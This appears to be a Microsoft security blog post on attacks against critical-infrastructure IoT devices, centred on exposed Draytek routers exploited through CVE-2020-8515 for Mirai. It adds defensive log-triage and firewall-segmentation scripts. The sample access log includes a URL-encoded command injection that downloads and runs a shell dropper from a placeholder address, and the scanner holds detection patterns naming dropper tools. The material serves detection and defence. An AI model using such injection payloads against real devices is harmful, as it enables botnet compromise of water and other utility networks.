Securing IoT devices against attacks that target critical infrastructure

South Staffordshire PLC, a company that supplies water to over one million customers in the United Kingdom, notified its customers in August that it had been the target of a criminal cyberattack. The incident highlights the sophisticated threats that critical industries face today. According to South Staffordshire, the breach did not appear to have caused damage to its systems and did not affect its ability to supply safe water to its customers.

The attack brings to light the risk of threat actors gaining access to industrial control system (ICS) environments. According to reports, a group associated with the Cl0p ransomware claimed responsibility for the attack, which followed a now-familiar extortion model in which the attackers exfiltrate data and demand payment for it without encrypting the organization's files. After the attack, confidential documents, along with screenshots of the supervisory control and data acquisition (SCADA) system used by the water treatment plants, were leaked.

As details of the attack and the vector used to access South Staffordshire PLC's networks are limited, the Microsoft Defender for IoT research team investigated the techniques threat actors have used in similar attacks. Microsoft researchers have previously observed activity involving internet-exposed IoT devices across industries; such devices can serve as a foothold into OT networks. Threat actors typically gain access either by deploying malware on information technology (IT) devices and then crossing the boundary into the operational technology (OT) part of the network to reach high-value operational assets, or by directly compromising unmanaged, usually less secure, IoT and OT devices.

IoT devices in critical infrastructure networks

IoT devices offer significant value to organizations and extend well beyond environmental monitoring sensors to common office equipment and network devices. However, IoT devices in critical infrastructure networks, if not properly secured, increase the risk of unauthorized access to operational assets and networks. Misconfigurations such as default credentials, together with unpatched vulnerabilities, are routinely abused by threat actors to gain access to a device or the network behind it. Once access is established, attackers can enumerate other assets on the same network, perform reconnaissance, and plan large-scale attacks on sensitive equipment and devices.

In monitoring threats against critical infrastructure and utilities, Microsoft researchers investigated water utility providers in the United Kingdom with exposed IoT devices within their networks. Using open-source intelligence (OSINT) and Microsoft Defender Threat Intelligence data, the team searched for exposed IoT devices integrated into the networks of water utility providers and found that such facilities were using Draytek Vigor routers, which are intended for home use.

Figure 1. Global mapping of internet-exposed Draytek Vigor devices (map image not reproduced here)

Devices that are difficult to patch, such as printers, cameras, routers, and gateways, are frequently overlooked as potential footholds into a network and are therefore often left exposed. In analyzing Microsoft threat intelligence, Microsoft researchers observed threat actors abusing a known remote code execution vulnerability in Draytek Vigor devices (CVE-2020-8515) to deploy the Mirai botnet. A remote code execution vulnerability such as CVE-2020-8515 lets an attacker run arbitrary commands on the exposed device; from that position they can move laterally within the network and reach vulnerable devices that were never directly exposed to the internet, such as SCADA systems.
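The lateral-movement chain above starts with a request that smuggles shell commands into a parameter of the router's web administration interface, and the Mirai deployment that follows is usually a one-liner that fetches a dropper into /tmp and runs it. The script below is an added example (not code from the original post or from Microsoft) of how a defender would triage access logs from such an interface for that pattern: it URL-decodes every query parameter, looks for shell metacharacters and dropper-style tokens, and rates the finding higher when the request came from outside the organization's own ranges, which is direct evidence that the admin interface is internet-exposed. The log format, CGI paths, parameter names and internal address ranges are constructed for illustration; they are generic and are not the vulnerable endpoint from the CVE-2020-8515 advisory, and TEST-NET addresses stand in for attacker sources.

```python
"""Flag command-injection attempts against a router's web administration CGI.

Added example: not code from the original post or from Microsoft. Log format,
CGI paths, parameter names and internal ranges are constructed for illustration
and are not the vulnerable endpoint described in the CVE-2020-8515 advisory.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (format assumed for this example):
#   <client_ip> [<timestamp>] "<METHOD> <path?query> HTTP/1.1" <status>
SAMPLE_LOG = """\
10.20.0.5 [2022-08-15T09:58:40Z] "GET /cgi-bin/login.cgi?user=operator&lang=en HTTP/1.1" 200
203.0.113.7 [2022-08-15T10:01:02Z] "GET /cgi-bin/login.cgi?user=admin HTTP/1.1" 200
203.0.113.7 [2022-08-15T10:01:09Z] "POST /cgi-bin/login.cgi?user=%27%0Awget%20http%3A%2F%2F198.51.100.9%2Fbot.sh%20-O%20%2Ftmp%2Fb%3Bsh%20%2Ftmp%2Fb%0A%27 HTTP/1.1" 200
198.51.100.23 [2022-08-15T10:03:17Z] "GET /cgi-bin/status.cgi?page=1%3Bbusybox%20tftp HTTP/1.1" 500
10.20.0.5 [2022-08-15T10:05:00Z] "GET /index.html HTTP/1.1" 200
10.20.0.5 [2022-08-15T10:06:30Z] "GET /cgi-bin/login.cgi?user=a%7Cid HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})$'
)
# Shell metacharacters that never belong in a login or status-page parameter.
META_RE = re.compile(r"[\n\r;|`]|\$\(|&&")
# Tokens typical of botnet droppers: fetch a payload, stage it under /tmp, execute it.
DROPPER_RE = re.compile(r"\b(wget|curl|tftp|busybox|chmod)\b|/tmp/|\bsh\s", re.IGNORECASE)
ADMIN_PREFIX = "/cgi-bin/"  # assumed: management CGI scripts live under this path
# Assumed address space of the organisation; anything else is treated as the internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def decode_param(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so a double-encoded payload cannot slip past the regexes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_external(ip: str) -> bool:
    """True when the client is outside INTERNAL_NETS, i.e. the request came from the internet."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return not any(addr in net for net in INTERNAL_NETS)


def analyze_line(line: str):
    """Return a finding dict for a suspicious request, or None for a benign one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    reasons = []
    # parse_qsl strips one layer of percent-encoding; decode_param handles the rest.
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_param(raw)
        if META_RE.search(value):
            reasons.append(f"shell metacharacter in parameter '{name}'")
        if DROPPER_RE.search(value):
            reasons.append(f"dropper-style command in parameter '{name}'")
    if not reasons:
        return None
    on_admin = parts.path.startswith(ADMIN_PREFIX)
    external = is_external(m.group("ip"))
    # Injection against the admin CGI from a routable address is the worst case:
    # the interface is internet-exposed and someone is already probing it.
    severity = "high" if on_admin and external else "medium"
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        "external": external,
        "severity": severity,
        "reasons": reasons,
    }


def analyze_log(text: str) -> list:
    """Run analyze_line over every line and collect the findings."""
    return [f for f in map(analyze_line, text.splitlines()) if f]


def external_sources(findings: list) -> set:
    """Addresses outside the organisation that sent injection attempts."""
    return {f["ip"] for f in findings if f["external"]}


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding["severity"].upper(), finding["ip"], finding["path"], "; ".join(finding["reasons"]))
```

On the constructed sample the two requests from TEST-NET addresses are rated high and the internal `a|id` probe medium; a high-severity hit is also the cue to check whether the device's management interface should be reachable from the WAN side at all.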

In water treatment applications, SCADA systems allow plants to monitor the levels of specific chemicals and toxins and to keep records of system operation. While the attack against South Staffordshire PLC does not appear to have involved abuse of these devices, the release of files pertaining to OT systems is itself a high risk to operations and underlines the importance of network segmentation to protect devices and networks from lateral movement.

Defending critical networks

Attacks on utility providers' OT networks and devices are high-risk events that can range from data theft to manipulation of the devices controlling operations. Such events can interrupt operations or, in severe cases, harm individuals and customers (for example, when attackers gained access to the water system of a Florida city, as reported in February 2021).

Given the severity of these attacks and their potential impact on utility providers' operations and even the safety of their customers, proper security practices around unmanaged IoT and OT devices are essential to reduce both the likelihood and the impact of such attacks. Defenses for OT networks must be comprehensive: they must prevent unauthorized system access and also include detections for abnormal, unfamiliar, and malicious behavior after a breach.

It is important to protect assets and to have strict security policies in place governing how and when devices and data can be accessed. We recommend the following defense strategies for organizations with both IoT and OT devices in their networks:

  • Adopt a comprehensive IoT and OT security solution such as Microsoft Defender for IoT to gain visibility into and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.
  • Enable vulnerability assessments to identify unpatched devices in the organizational network and set up workflows for initiating the appropriate patch processes through Microsoft Defender Vulnerability Management and Microsoft Defender for Endpoint with the Microsoft Defender for IoT add-on.
  • Reduce the attack surface by eliminating unnecessary internet connections to IoT devices and OT control systems. Implement Zero Trust practices by applying network segmentation to prevent an attacker from moving laterally and compromising assets after an intrusion. IoT devices and OT networks should be isolated from IT networks with firewalls. Extend vulnerability and exposure control beyond the firewall with Microsoft Defender External Attack Surface Management. Turn on attack surface reduction rules in Microsoft Defender for Endpoint to block common attack techniques, such as those used by ransomware groups.
  • Increase network security by enforcing multifactor authentication (MFA), for example with Azure Active Directory MFA. Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
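The segmentation and exposure-reduction advice above is easy to state and easy to get wrong in practice, because a single permissive rule can chain a home-class router's admin page to the plant's SCADA servers. The script below is an added example (not code from the original post or from Microsoft) of how to validate a zone-level policy: it models each firewall allow rule as an edge, searches for any path from the internet to the crown-jewel zones, and separately checks that OT zones have no route out to the internet (the route a Mirai-style dropper or command-and-control beacon would need). Zone names, services and both rule sets are constructed for illustration; in practice the rule list would be exported from the firewall, but the check is the same.

```python
"""Check a zone-level segmentation policy for paths from the internet into OT.

Added example: not code from the original post or from Microsoft. Zone names,
services and rules are constructed; a real check would consume the firewall's
exported rule set instead of the literals below.
"""
from collections import deque
from typing import Dict, List, Optional, Tuple

Rule = Tuple[str, str, str]  # (source zone, destination zone, service allowed)

# Flat design (constructed): the router's admin page is reachable from the internet,
# its LAN side is the office network, and nothing separates that network from SCADA.
FLAT: List[Rule] = [
    ("internet", "router-mgmt", "http-admin"),
    ("router-mgmt", "it-lan", "any"),
    ("it-lan", "scada", "any"),
    ("scada", "plc", "modbus"),
    ("it-lan", "internet", "https"),
    ("scada", "internet", "https"),
]

# Segmented design (constructed): admin page only from IT, OT reachable only via a
# jump host in an OT DMZ, historian data exported one way, no plant egress.
SEGMENTED: List[Rule] = [
    ("it-lan", "router-mgmt", "http-admin"),
    ("it-lan", "internet", "https"),
    ("it-lan", "ot-dmz", "rdp"),            # MFA-protected jump host lives here
    ("ot-dmz", "scada", "vendor-protocol"),
    ("scada", "plc", "modbus"),
    ("scada", "historian-dmz", "sql"),      # OT pushes data out; nothing comes back
    ("it-lan", "historian-dmz", "https"),
]

CROWN_JEWELS = ("scada", "plc")


def reachable_from(rules: List[Rule], start: str) -> Dict[str, List[Tuple[str, str]]]:
    """Breadth-first search over allow rules. For every zone reachable from start,
    returns the hop list [(service, zone), ...] of one shortest path."""
    paths: Dict[str, List[Tuple[str, str]]] = {start: []}
    queue = deque([start])
    while queue:
        here = queue.popleft()
        for src, dst, service in rules:
            if src == here and dst not in paths:
                paths[dst] = paths[here] + [(service, dst)]
                queue.append(dst)
    return paths


def fmt_path(start: str, hops: List[Tuple[str, str]]) -> str:
    """Render a hop list as 'a -[svc]-> b -[svc]-> c'."""
    return start + "".join(f" -[{svc}]-> {zone}" for svc, zone in hops)


def attack_paths(rules: List[Rule], start: str = "internet",
                 targets=CROWN_JEWELS) -> Dict[str, Optional[str]]:
    """For each target zone, one path from start through the allow rules, or None."""
    paths = reachable_from(rules, start)
    return {t: fmt_path(start, paths[t]) if t in paths else None for t in targets}


def egress_from(rules: List[Rule], zones=CROWN_JEWELS, sink: str = "internet") -> List[str]:
    """OT zones that can reach the internet at all: a dropper download or C2 beacon
    from a compromised host needs exactly this route."""
    return [z for z in zones if sink in reachable_from(rules, z)]


def violations(rules: List[Rule]) -> List[str]:
    """Human-readable list of policy problems; empty means the policy passes."""
    out = []
    for target, path in attack_paths(rules).items():
        if path:
            out.append(f"{target} reachable from internet: {path}")
    for zone in egress_from(rules):
        out.append(f"{zone} has a route to the internet")
    return out


if __name__ == "__main__":
    for name, rules in (("flat", FLAT), ("segmented", SEGMENTED)):
        print(f"{name}:")
        for v in violations(rules) or ["no violations"]:
            print("  " + v)
```

For the flat rule set the check reports the full chain internet -> router-mgmt -> it-lan -> scada -> plc and the direct SCADA egress; the segmented set passes, and the only way from IT to SCADA runs through the jump host in the OT DMZ. Zone-level checks like this miss host-level exceptions, so they complement rather than replace device-level monitoring.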

David Atch, Ilana Sivan, and Mae Dotan, Microsoft Defender for IoT Research Team
Ross Bevington, Microsoft Threat Intelligence Center (MSTIC)
Jaclyn Blumenfield, Microsoft Defender Threat Intelligence